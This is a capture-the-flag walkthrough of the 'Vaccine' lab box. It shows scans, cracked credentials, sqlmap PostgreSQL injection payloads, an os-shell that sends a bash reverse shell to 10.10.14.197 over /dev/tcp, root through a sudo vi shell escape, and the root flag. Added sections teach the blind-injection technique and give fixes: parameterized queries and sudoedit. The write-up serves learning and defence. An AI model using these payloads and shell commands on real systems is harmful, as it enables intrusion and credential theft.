Vaccine

$ nmap -p- -A -T4 10.10.10.46
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA)
| 256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA)
|_ 256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: MegaCorp Login
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
$ nikto -h 10.10.10.46
+ Server: Apache/2.4.41 (Ubuntu)
+ Cookie PHPSESSID created without the httponly flag
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ 7865 requests: 2 error(s) and 6 item(s) reported on remote host
$ dirb http://10.10.10.46
+ http://10.10.10.46/index.php (CODE:200|SIZE:2312)
+ http://10.10.10.46/server-status (CODE:403|SIZE:276)
<User>ftpuser</User>
<Pass>mc@F1l3ZilL4</Pass>
$ ftp ftpuser@10.10.10.46
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0            2533 Feb 03  2020 backup.zip
$ zip2john backup.zip > hash.txt
$ john hash.txt --fork=4 -w /usr/share/wordlists/rockyou.txt
741852963        (backup.zip)
$ less index.php
$_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") 

$ hashcat -m 0 -a 0 md5hash.txt /usr/share/wordlists/rockyou.txt --show
2cb42f8734ea607eefed3b70af13bbd3:qwerty789
After logging in as admin:qwerty789, the dashboard exposes a search parameter:
http://10.10.10.46/dashboard.php?search=a
The search parameter is injectable. sqlmap, run with the authenticated PHPSESSID cookie, identifies a PostgreSQL backend:
sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=vigasgqiigqpv09s8imhqkp5i9"
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (GET)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: search=a' AND (SELECT (CASE WHEN (1032=1032) THEN NULL ELSE CAST((CHR(115)||CHR(87)||CHR(122)||CHR(110)) AS NUMERIC) END)) IS NULL-- KWNP

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: search=a' AND 2998=CAST((CHR(113)||CHR(98)||CHR(113)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (2998=2998) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(118)||CHR(106)||CHR(113)) AS NUMERIC)-- xtnq

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=a';SELECT PG_SLEEP(5)--

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: search=a' AND 5040=(SELECT 5040 FROM PG_SLEEP(5))-- ulVr
---
[13:16:58] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 19.10 or 20.04 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
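What sqlmap is doing with the boolean-based blind technique above, as an added example that is not part of the original writeup: a stand-in for the vulnerable dashboard query on an in-memory SQLite database (the target runs PostgreSQL; sqlite3 is used here only so the script runs offline), a yes/no oracle built from whether the page returns rows, and character-by-character extraction by binary search on the code point, beside the parameterized query that closes the hole. Table names, car names and the app_config table are constructed for the example; the credentials mirror the ones hard-coded in dashboard.php.

```python
import sqlite3

# Stand-in for the target's carsdb: a table the dashboard searches and a
# table holding something worth stealing. Constructed sample data; the
# credentials mirror the ones hard-coded in dashboard.php on the box.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE cars(name TEXT, type TEXT);
        INSERT INTO cars VALUES ('Elixir','Sports'), ('Sandy','Sedan'), ('Meteor','Coupe');
        CREATE TABLE app_config(db_user TEXT, db_pass TEXT);
        INSERT INTO app_config VALUES ('postgres','P@s5w0rd!');
    """)
    return db

DB = build_db()


def search_vulnerable(term):
    """Same mistake as dashboard.php: the search value is pasted into the SQL."""
    sql = f"SELECT name FROM cars WHERE name LIKE '%{term}%'"
    return DB.execute(sql).fetchall()


def search_fixed(term):
    """Parameterized query (pg_query_params in PHP): the value can never become SQL."""
    return DB.execute("SELECT name FROM cars WHERE name LIKE ?", (f"%{term}%",)).fetchall()


def oracle(condition):
    """Boolean-based blind oracle: True when the injected condition keeps rows
    on the page, False when the result set is empty or the query errors.
    The payload closes the LIKE string, ANDs in our condition and comments
    out the rest, the same shape as sqlmap's `a' AND (...)-- xxxx` above."""
    payload = f"%' AND ({condition})-- "
    try:
        return len(search_vulnerable(payload)) > 0
    except sqlite3.Error:
        return False


def extract(expr, max_len=64):
    """Recover the string value of SQL expression `expr` one character at a
    time, binary-searching the code point (about 7 requests per character).
    SQLite's unicode()/substr() stand in for PostgreSQL's ascii()/substr()."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"length({expr}) >= {pos}"):
            break                       # past the end of the string
        lo, hi = 32, 126                # printable ASCII; anything else would be misread
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr({expr},{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    print("db_user:", extract("(SELECT db_user FROM app_config)"))
    print("db_pass:", extract("(SELECT db_pass FROM app_config)"))
    print("fixed query with payload:", search_fixed("%' OR 1=1-- "))
```

The letter-by-letter `retrieved:` output sqlmap prints further down is this loop in action; each character costs a handful of requests, which is why the time-based variant with PG_SLEEP(5) is the slowest of the four techniques listed. The fixed version returns nothing for the payload because the driver sends it as a LIKE pattern, not as SQL.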
$ nc -lvnp 4444
tried this many times:
sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=vigasgqiigqpv09s8imhqkp5i9" --os-shell
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] 
[13:20:48] [INFO] retrieved: 'postgres'
command standard output:
---
p
o
s
t
g
r
e
s
---
os-shell> bash -c 'bash -i >& /dev/tcp/10.10.14.197/4444 0>&1'
do you want to retrieve the command standard output? [Y/n/a] 
kali@kali:~/0.htb/Starting_Point/Vaccine46$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.197] from (UNKNOWN) [10.10.10.46] 56178
bash: cannot set terminal process group (6064): Inappropriate ioctl for device
bash: no job control in this shell
postgres@vaccine:/var/lib/postgresql/11/main$ 
postgres@vaccine:/var/lib/postgresql/11/main$ SHELL=/bin/bash script -q /dev/null
postgres@vaccine:/var/lib/postgresql/11/main$ cd /var/www/html  
postgres@vaccine:/var/www/html$ ls
bg.png         dashboard.js   index.php    style.css
dashboard.css  dashboard.php  license.txt
postgres@vaccine:/var/www/html$ cat dashboard.php

$conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");

postgres@vaccine:/var/www/html$ python3 -c "import pty; pty.spawn('/bin/bash')"
postgres@vaccine:/var/www/html$ 
postgres@vaccine:/var/www/html$ sudo -l
[sudo] password for postgres: P@s5w0rd!

Matching Defaults entries for postgres on vaccine:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
postgres@vaccine:/var/www/html$ 
postgres@vaccine:/var/www/html$ sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
:!/bin/bash
root@vaccine:/var/www/html# 
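The postgres OS account reuses the pg_connect password from dashboard.php, and the single sudo rule it unlocks hands out root because vi runs any command with `:!`. The sudoers lines below are an added example, not taken from the box: the rule reconstructed from the sudo -l output above, beside the usual replacement, sudoedit, which copies the file to a temporary location, runs the user's editor as the invoking user (so `:!/bin/bash` yields a postgres shell, not root) and only copies the result back to the protected path with privilege.

```sudoers
# As found on vaccine (reconstructed from `sudo -l`): root runs vi,
# and vi's :! shell escape runs any command as root
postgres ALL=(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf

# Replacement: the editor runs unprivileged on a temp copy; only the
# final write-back to pg_hba.conf happens as root
postgres ALL=(root) sudoedit /etc/postgresql/11/main/pg_hba.conf
```

The same shell escape works for every editor, pager and interpreter sudo can be pointed at, so the check after any `sudo -l` is whether the allowed binary can spawn a process, not whether the file it edits looks harmless.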

root@vaccine:~# cat root.txt
dd6e058e814260bc70e9bbdef2715849
root@vaccine:~# 